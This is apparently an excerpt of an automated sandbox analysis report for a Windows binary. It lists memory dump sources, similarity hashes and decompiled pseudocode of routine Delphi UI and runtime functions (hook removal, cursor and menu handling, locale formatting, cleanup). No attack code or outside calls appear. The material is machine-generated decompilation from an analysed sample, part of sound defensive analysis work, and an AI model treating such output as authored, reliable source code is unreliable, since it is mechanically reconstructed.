    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Locale$InfoThread$CalendarEnum
    • String ID:
    • API String ID: 4102113445-0
    • Opcode ID: 853ab895cef462e9062c5496d70793c90be0b7f06dede836451bab69c2243650
    • Instruction ID: 7c7f9a31c1e27f3a09b9a434cb1c46137029dafd8fae79e3c1dbb4509c71d34d
    • Opcode Fuzzy Hash: 853ab895cef462e9062c5496d70793c90be0b7f06dede836451bab69c2243650
    • Instruction Fuzzy Hash: 1301F7346006046BE701BBB1DC13B5A7298DB45B18F214176F901BA6C1E77CAE1181EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00449C64() {
    				void* _t2;
    				void* _t5;
    				void* _t8;
    				struct HHOOK__* _t10;
    
    				if( *0x47bbb4 != 0) {
    					_t10 =  *0x47bbb4; // 0x0
    					UnhookWindowsHookEx(_t10);
    				}
    				 *0x47bbb4 = 0;
    				if( *0x47bbb8 != 0) {
    					_t2 =  *0x47bbb0; // 0x0
    					SetEvent(_t2);
    					if(GetCurrentThreadId() !=  *0x47bbac) {
    						_t8 =  *0x47bbb8; // 0x0
    						WaitForSingleObject(_t8, 0xffffffff);
    					}
    					_t5 =  *0x47bbb8; // 0x0
    					CloseHandle(_t5);
    					 *0x47bbb8 = 0;
    					return 0;
    				}
    				return 0;
    			}

    APIs
    • UnhookWindowsHookEx.USER32(00000000), ref: 00449C73
    • SetEvent.KERNEL32(00000000,0044BF2E), ref: 00449C8E
    • GetCurrentThreadId.KERNEL32 ref: 00449C93
    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0044BF2E), ref: 00449CA8
    • CloseHandle.KERNEL32(00000000,00000000,0044BF2E), ref: 00449CB3
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
    • String ID:
    • API String ID: 2429646606-0
    • Opcode ID: 1ff296c76c76e5b92da3987f82d4b2c8a8414b2519e715427bbf5e9f972daaf7
    • Instruction ID: 8d672b428758f3400e63ca0f1089301c0078be3073cd5674fa8fc712f27adef0
    • Opcode Fuzzy Hash: 1ff296c76c76e5b92da3987f82d4b2c8a8414b2519e715427bbf5e9f972daaf7
    • Instruction Fuzzy Hash: 89F0A5716042009AD760FBB9EC89B5732E8E705314B1109BEB909D3AE9D739B9D0DB9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00436744(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
    				intOrPtr* _v8;
    				struct tagPOINT _v16;
    				char _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				char _v36;
    				struct tagMSG _v64;
    				intOrPtr _v68;
    				long _v72;
    				char _v76;
    				intOrPtr _t125;
    				int _t126;
    				int _t140;
    				int _t147;
    				intOrPtr* _t175;
    				int _t186;
    				void* _t191;
    				intOrPtr* _t209;
    				void* _t213;
    				intOrPtr _t214;
    				intOrPtr _t219;
    				int _t232;
    				intOrPtr _t233;
    				int _t236;
    				intOrPtr* _t242;
    				intOrPtr _t262;
    				intOrPtr _t278;
    				intOrPtr _t289;
    				int _t297;
    				int _t300;
    				int _t302;
    				int _t303;
    				int _t304;
    				void* _t307;
    				void* _t309;
    				void* _t315;
    
    				_t315 = __fp0;
    				_t306 = _t307;
    				_v76 = 0;
    				_t242 = __edx;
    				_v8 = __eax;
    				_push(_t307);
    				_push(0x436b1c);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t307 + 0xffffffb8;
    				_t125 =  *__edx;
    				_t309 = _t125 - 0x202;
    				if(_t309 > 0) {
    					_t126 = _t125 - 0x203;
    					__eflags = _t126;
    					if(__eflags == 0) {
    						E00406B50( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
    						_t297 = E004351D4(_v8,  &_v20,  &_v72, __eflags);
    						__eflags = _t297;
    						if(_t297 != 0) {
    							__eflags =  *(_t297 + 4);
    							if( *(_t297 + 4) != 0) {
    								__eflags = _v20 - 2;
    								if(_v20 == 2) {
    									E0042A7B8();
    									E0042CC10( *(_t297 + 4), 0, 0, 1);
    								}
    							}
    						}
    						L47:
    						if( *((short*)(_v8 + 0x32)) != 0) {
    							 *((intOrPtr*)(_v8 + 0x30))();
    						}
    						L49:
    						_pop(_t262);
    						 *[fs:eax] = _t262;
    						_push(0x436b23);
    						return E004041E0( &_v76);
    					}
    					_t140 = _t126 - 0xae2d;
    					__eflags = _t140;
    					if(_t140 == 0) {
    						 *((intOrPtr*)(_v8 + 0x30))();
    						__eflags =  *(__edx + 0xc);
    						if( *(__edx + 0xc) != 0) {
    							goto L49;
    						}
    						_t300 =  *((intOrPtr*)( *_v8 + 4))();
    						__eflags = _v20 - 0x12;
    						if(_v20 != 0x12) {
    							__eflags = _t300;
    							if(_t300 == 0) {
    								goto L49;
    							}
    							_t147 = _v20 - 2;
    							__eflags = _t147;
    							if(_t147 == 0) {
    								L46:
    								E0042B8F8(_t300,  &_v36);
    								 *((intOrPtr*)( *_v8))();
    								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
    								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
    								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
    								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
    								E0042BF48(_t300,  &_v76);
    								E00404234( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
    								asm("movsd");
    								asm("movsd");
    								asm("movsd");
    								asm("movsd");
    								goto L49;
    							}
    							__eflags = _t147 != 0x12;
    							if(_t147 != 0x12) {
    								goto L49;
    							}
    							goto L46;
    						}
    						E004041E0( *((intOrPtr*)(__edx + 8)) + 0x38);
    						goto L49;
    					} else {
    						__eflags = _t140 == 0x12;
    						if(_t140 == 0x12) {
    							_t175 =  *((intOrPtr*)(__edx + 8));
    							__eflags =  *_t175 - 0xb00b;
    							if( *_t175 == 0xb00b) {
    								E0043662C(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)));
    							}
    						}
    						goto L47;
    					}
    				}
    				if(_t309 == 0) {
    					__eflags =  *(_v8 + 0x60);
    					if(__eflags != 0) {
    						E00436178(_v8, __eflags);
    					} else {
    						E00406B50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
    						_t302 = E004351D4(_v8,  &_v20,  &_v16, __eflags);
    						__eflags = _t302;
    						if(_t302 != 0) {
    							__eflags = _v20 - 0x14;
    							if(_v20 == 0x14) {
    								_t295 =  *((intOrPtr*)(_t302 + 4));
    								_t278 =  *0x440ce4; // 0x440d30
    								_t186 = E00403604( *((intOrPtr*)(_t302 + 4)), _t278);
    								__eflags = _t186;
    								if(_t186 == 0) {
    									E0042BE68(_t295, 0);
    								} else {
    									E00447C6C(_t295,  &_v20);
    								}
    							}
    						}
    					}
    					goto L47;
    				}
    				_t191 = _t125 - 0x20;
    				if(_t191 == 0) {
    					GetCursorPos( &_v16);
    					E0042BA9C( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
    					_v16.x = _v72;
    					_v16.y = _v68;
    					__eflags =  *((short*)(_t242 + 8)) - 1;
    					if( *((short*)(_t242 + 8)) != 1) {
    						goto L47;
    					}
    					__eflags = E0043260C( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
    					if(__eflags != 0) {
    						goto L47;
    					}
    					__eflags = E0043113C( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
    					if(__eflags <= 0) {
    						goto L47;
    					}
    					_t303 = E004351D4(_v8,  &_v20,  &_v16, __eflags);
    					__eflags = _t303;
    					if(_t303 == 0) {
    						goto L47;
    					}
    					__eflags = _v20 - 0x12;
    					if(_v20 != 0x12) {
    						goto L47;
    					}
    					_t209 =  *0x47a0fc; // 0x47bba0
    					SetCursor(E00449384( *_t209,  &_v20,  *((short*)(0x479a80 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
    					 *((intOrPtr*)(_t242 + 0xc)) = 1;
    					goto L49;
    				}
    				_t213 = _t191 - 0x1e0;
    				if(_t213 == 0) {
    					_t214 = _v8;
    					__eflags =  *(_t214 + 0x60);
    					if( *(_t214 + 0x60) != 0) {
    						E0043622C(_v8);
    						E00406B50( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
    						_t219 = _v8;
    						 *(_t219 + 0x50) = _v72;
    						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
    						E004366B4(_t306);
    						E0043622C(_v8);
    					}
    					goto L47;
    				}
    				if(_t213 == 1) {
    					E00406B50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
    					_t256 =  &_v20;
    					_t304 = E004351D4(_v8,  &_v20,  &_v16, __eflags);
    					__eflags = _t304;
    					if(_t304 == 0) {
    						goto L47;
    					}
    					__eflags = _v20 - 0x12;
    					if(__eflags != 0) {
    						__eflags = _v20 - 2;
    						if(_v20 != 2) {
    							goto L47;
    						}
    						_t232 = PeekMessageA( &_v64, E0043260C( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
    						__eflags = _t232;
    						if(_t232 == 0) {
    							_t289 =  *0x428474; // 0x4284c0
    							_t236 = E00403604( *((intOrPtr*)(_t304 + 4)), _t289);
    							__eflags = _t236;
    							if(_t236 != 0) {
    								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
    							}
    						}
    						_t233 =  *((intOrPtr*)(_t304 + 4));
    						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
    						if( *((char*)(_t233 + 0x9b)) == 1) {
    							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
    							if( *((char*)(_t233 + 0x5d)) == 1) {
    								E0042C5B8(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
    							}
    						}
    						goto L49;
    					}
    					E00436118(_v8,  &_v16, _t304, __eflags);
    				} else {
    				}
    			}

    APIs
    • GetCursorPos.USER32(?), ref: 00436984
    • SetCursor.USER32(00000000,?,00000000,00436B1C), ref: 00436A16
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Cursor
    • String ID: 0D
    • API String ID: 3268636600-523618118
    • Opcode ID: 08cfc9af08fe138c179c14b782fee68908b324e32496a2abbcf1515e0a50ea97
    • Instruction ID: 787c8efa0447c5c4f655f70895a78cbb7319bcc81ea4666ae08ec2f48b013013
    • Opcode Fuzzy Hash: 08cfc9af08fe138c179c14b782fee68908b324e32496a2abbcf1515e0a50ea97
    • Instruction Fuzzy Hash: 66C16130A00216EFCB10EF69C98599EB7F1BF09304F56D56AE801AB355DB78EE41CB49
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0044C1CC(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				struct tagPOINT _v32;
    				char _v33;
    				intOrPtr _v40;
    				char _v44;
    				intOrPtr _v48;
    				struct HWND__* _v52;
    				intOrPtr _v56;
    				char _v60;
    				struct tagRECT _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				int _v88;
    				int _v92;
    				intOrPtr _v96;
    				char _v100;
    				struct tagRECT _v116;
    				char _v132;
    				intOrPtr _v136;
    				char _v140;
    				char _v144;
    				char _v148;
    				struct HWND__* _t130;
    				struct HWND__* _t166;
    				intOrPtr _t188;
    				char _t194;
    				intOrPtr _t218;
    				intOrPtr _t222;
    				void* _t238;
    				intOrPtr* _t250;
    				intOrPtr _t269;
    				intOrPtr _t270;
    				intOrPtr _t272;
    				intOrPtr _t278;
    				struct tagRECT* _t301;
    				intOrPtr* _t305;
    				intOrPtr _t306;
    				void* _t313;
    
    				_t312 = _t313;
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_v144 = 0;
    				_v148 = 0;
    				asm("movsd");
    				asm("movsd");
    				_v8 = __eax;
    				_t269 =  *0x442070; // 0x442074
    				E00404B50( &_v100, _t269);
    				_t250 =  &_v8;
    				_push(_t313);
    				_push(0x44c552);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t313 + 0xffffff70;
    				 *((char*)( *_t250 + 0x58)) = 0;
    				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E00442448() == 0 || E00449ADC(E0042A804( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
    					L23:
    					_t130 = _v52;
    					__eflags = _t130;
    					if(_t130 <= 0) {
    						E0044BF10( *_t250);
    					} else {
    						E0044BD18( *_t250, 0, _t130);
    					}
    					goto L26;
    				} else {
    					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
    					_v92 = _v16;
    					_v88 = _v12;
    					_v88 = _v88 + E0044BF48();
    					_v84 = E00448E70();
    					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
    					E0042B8F8( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
    					_t301 =  &_v76;
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
    					_v32.x = 0;
    					_v32.y = 0;
    					_t305 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
    					_t319 = _t305;
    					if(_t305 == 0) {
    						_t306 =  *((intOrPtr*)( *_t250 + 0x60));
    						_t278 =  *0x428474; // 0x4284c0
    						_t166 = E00403604(_t306, _t278);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							__eflags =  *(_t306 + 0x190);
    							if( *(_t306 + 0x190) != 0) {
    								ClientToScreen( *(_t306 + 0x190),  &_v32);
    							}
    						}
    					} else {
    						 *((intOrPtr*)( *_t305 + 0x40))();
    					}
    					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
    					E0042BA9C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
    					_v60 = _v140;
    					_v56 = _v136;
    					E00449AA4( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
    					E00429078(_v148,  &_v140,  &_v144, _t319);
    					E00404278( &_v44, _v144);
    					_v52 = 0;
    					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
    					_t188 =  *0x479ba0; // 0x4289f8
    					_v96 = _t188;
    					_v40 = 0;
    					_t257 = 0;
    					_v33 = E0042D0C4( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
    					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
    						_t257 =  &_v33;
    						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
    					}
    					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
    						_t194 = 0;
    					} else {
    						_t194 = 1;
    					}
    					_t284 =  *_t250;
    					 *((char*)( *_t250 + 0x58)) = _t194;
    					if( *((char*)( *_t250 + 0x58)) == 0) {
    						goto L23;
    					} else {
    						_t326 = _v44;
    						if(_v44 == 0) {
    							goto L23;
    						}
    						E0044C0A8(_v96, _t257, _t284, _t312);
    						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
    						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
    						OffsetRect( &_v116, _v92, _v88);
    						if(E00403674( *((intOrPtr*)( *_t250 + 0x84)), _t326) != 0) {
    							_t238 = E0044C108(_v44, _t250, _t301, 0xffc8, _t312) + 5;
    							_v116.left = _v116.left - _t238;
    							_v116.right = _v116.right - _t238;
    						}
    						E0042BA70( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
    						_t218 =  *_t250;
    						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
    						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
    						E0042BA70( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
    						_t222 =  *_t250;
    						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
    						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
    						E0042C0BC( *((intOrPtr*)( *_t250 + 0x84)), _v80);
    						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
    						E00449BF0(_v44);
    						_t231 = _v52;
    						if(_v52 <= 0) {
    							E0044BD18( *_t250, 1, _v48);
    						} else {
    							E0044BD18( *_t250, 0, _t231);
    						}
    						L26:
    						_pop(_t270);
    						 *[fs:eax] = _t270;
    						_push(0x44c559);
    						E00404204( &_v148, 2);
    						_t272 =  *0x442070; // 0x442074
    						return E00404C20( &_v100, _t272);
    					}
    				}
    			}

    APIs
      • Part of subcall function 00442448: GetActiveWindow.USER32 ref: 0044244B
      • Part of subcall function 00442448: GetCurrentThreadId.KERNEL32 ref: 00442460
      • Part of subcall function 0044BF48: GetCursor.USER32(?), ref: 0044BF63
      • Part of subcall function 0044BF48: GetIconInfo.USER32(00000000,?), ref: 0044BF69
    • ClientToScreen.USER32(?,?), ref: 0044C2F8
    • OffsetRect.USER32(?,?,?), ref: 0044C30F
    • OffsetRect.USER32(?,?,?), ref: 0044C43F
      • Part of subcall function 0044BD18: SetTimer.USER32(00000000,00000000,?,00449AFC), ref: 0044BD32
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
    • String ID: t D
    • API String ID: 3022406661-1217181877
    • Opcode ID: db21225e9c9780066c510f402bfa3ec08bf04bf4dd1dd07f96f862bcea818cc0
    • Instruction ID: e9d520b035f0d8215a038eea2a8e9f45088717acbf43526da4b5d0842f052af2
    • Opcode Fuzzy Hash: db21225e9c9780066c510f402bfa3ec08bf04bf4dd1dd07f96f862bcea818cc0
    • Instruction Fuzzy Hash: 55C10475A002288FDB50DFA9C8C0A9EB7F5BF09304F5481AAE504EB365DB34AD4ACF55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0040B188(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40b352);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E004041E0(__edx);
    				E0040AE50(GetThreadLocale(), 0x40b368, 0x1009,  &_v12);
    				if(E00408140(0x40b368, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E004044A0(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x479110], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E00408790(_t124 + _t92 - 1, 2, 0x40b36c);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E00408790(_t124 + _t92 - 1, 4, 0x40b37c);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E00408790(_t124 + _t92 - 1, 2, 0x40b394);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E004044A8(_t122, 0x40b3ac);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E004043C8();
    												E004044A8(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E004044A8(_t122, 0x40b3a0);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E004044A8(_t122, 0x40b38c);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E004044A8(_t122, 0x40b378);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040C220(_t124, _t92);
    							E00404700(_t124, _v8, _t92,  &_v20);
    							E004044A8(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x47b73c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00404234(_t122, _t124);
    					} else {
    						while(_t92 <= E004044A0(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E004043C8();
    									E004044A8(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040B359);
    				return E00404204( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040B352,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040B1B7
      • Part of subcall function 0040AE50: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AE6E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Locale$InfoThread
    • String ID: eeee$ggg$yyyy
    • API String ID: 4232894706-1253427255
    • Opcode ID: d7b13ad06268066e0e3d9545960157c368da61d4444f732cfd4d74e818bfd3be
    • Instruction ID: ea3283d12c66047e48a26d7514356e13d5da0e45fb844779695d61bf13272dc9
    • Opcode Fuzzy Hash: d7b13ad06268066e0e3d9545960157c368da61d4444f732cfd4d74e818bfd3be
    • Instruction Fuzzy Hash: 3741E4703002058BC711AB7A98857BEB2A6DB85308BB4447FE951F77C5DB3CDD0292AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0043EF1C(intOrPtr* __eax) {
    				struct tagMENUITEMINFOA _v128;
    				intOrPtr _v132;
    				int _t16;
    				intOrPtr* _t29;
    				struct HMENU__* _t36;
    				MENUITEMINFOA* _t37;
    
    				_t37 =  &_v128;
    				_t29 = __eax;
    				_t16 =  *0x47a120; // 0x47b738
    				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
    					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
    					_t37->cbSize = 0x2c;
    					_v132 = 0x10;
    					_v128.hbmpUnchecked =  &(_v128.cch);
    					_v128.dwItemData = 0x50;
    					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
    					if(_t16 != 0) {
    						_t16 = E0043F2D0(_t29);
    						asm("sbb edx, edx");
    						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
    							_v128.cbSize = ((E0043F2D0(_t29) & 0x0000007f) << 0x0000000d) + ((E0043F2D0(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
    							_v132 = 0x10;
    							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
    							if(_t16 != 0) {
    								return DrawMenuBar( *(_t29 + 0x38));
    							}
    						}
    					}
    				}
    				return _t16;
    			}

    APIs
    • GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0043EF6A
    • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0043EFBC
    • DrawMenuBar.USER32(00000000), ref: 0043EFC9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Menu$InfoItem$Draw
    • String ID: P
    • API String ID: 3227129158-3110715001
    • Opcode ID: 19572b5fd4325c5a85f5497dada60b5f77a4a60905ed85047c09cfceccd68024
    • Instruction ID: 33f587be619990b3f930e4c4d0f8775a3a4c2119ffd5e702ead2e88aede24f5a
    • Opcode Fuzzy Hash: 19572b5fd4325c5a85f5497dada60b5f77a4a60905ed85047c09cfceccd68024
    • Instruction Fuzzy Hash: 281194306052006FD310DB2ACC85B5B76D4AF89368F149A7AF095DB3E9D779C854C74A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E00421F0C(void* __ebx, void* __ecx, void* __edx) {
    				intOrPtr _t3;
    				intOrPtr _t5;
    				intOrPtr _t7;
    				intOrPtr _t10;
    				intOrPtr _t12;
    				intOrPtr _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				void* _t20;
    				void* _t27;
    				intOrPtr _t33;
    				intOrPtr _t34;
    				intOrPtr _t35;
    				intOrPtr _t38;
    
    				_t27 = __ecx;
    				_push(_t38);
    				_push(0x421fd5);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t38;
    				 *0x47b8ac =  *0x47b8ac + 1;
    				if( *0x47b8ac == 0) {
    					_t3 =  *0x47b904; // 0x2320aa8
    					E0040346C(_t3);
    					_t5 =  *0x4796cc; // 0x0
    					E0040346C(_t5);
    					_t7 =  *0x4796c8; // 0x0
    					E0040346C(_t7);
    					E0041F014(__ebx, _t27);
    					_t10 =  *0x4796d0; // 0x2320acc
    					E0040346C(_t10);
    					_t12 =  *0x47b900; // 0x2320b08
    					E0040346C(_t12);
    					_t14 =  *0x47b8f4; // 0x2320a30
    					E0040346C(_t14);
    					_t16 =  *0x47b8f8; // 0x2320a58
    					E0040346C(_t16);
    					_t18 =  *0x47b8fc; // 0x2320a80
    					E0040346C(_t18);
    					_t20 =  *0x47b8a8; // 0x93080724
    					DeleteObject(_t20);
    					_push(0x47b8c4);
    					L00406284();
    					_push(0x47b8dc);
    					L00406284();
    					_t34 =  *0x4129e8; // 0x4129ec
    					E00404C6C(0x4795e8, 0x12, _t34);
    					_t35 =  *0x4129e8; // 0x4129ec
    					E00404C6C(0x479448, 0x34, _t35);
    				}
    				_pop(_t33);
    				 *[fs:eax] = _t33;
    				_push(0x421fdc);
    				return 0;
    			}

    APIs
    • DeleteObject.GDI32(93080724), ref: 00421F84
    • RtlDeleteCriticalSection.NTDLL(0047B8C4), ref: 00421F8E
    • RtlDeleteCriticalSection.NTDLL(0047B8DC), ref: 00421F98
    Strings
    Memory Dump Source
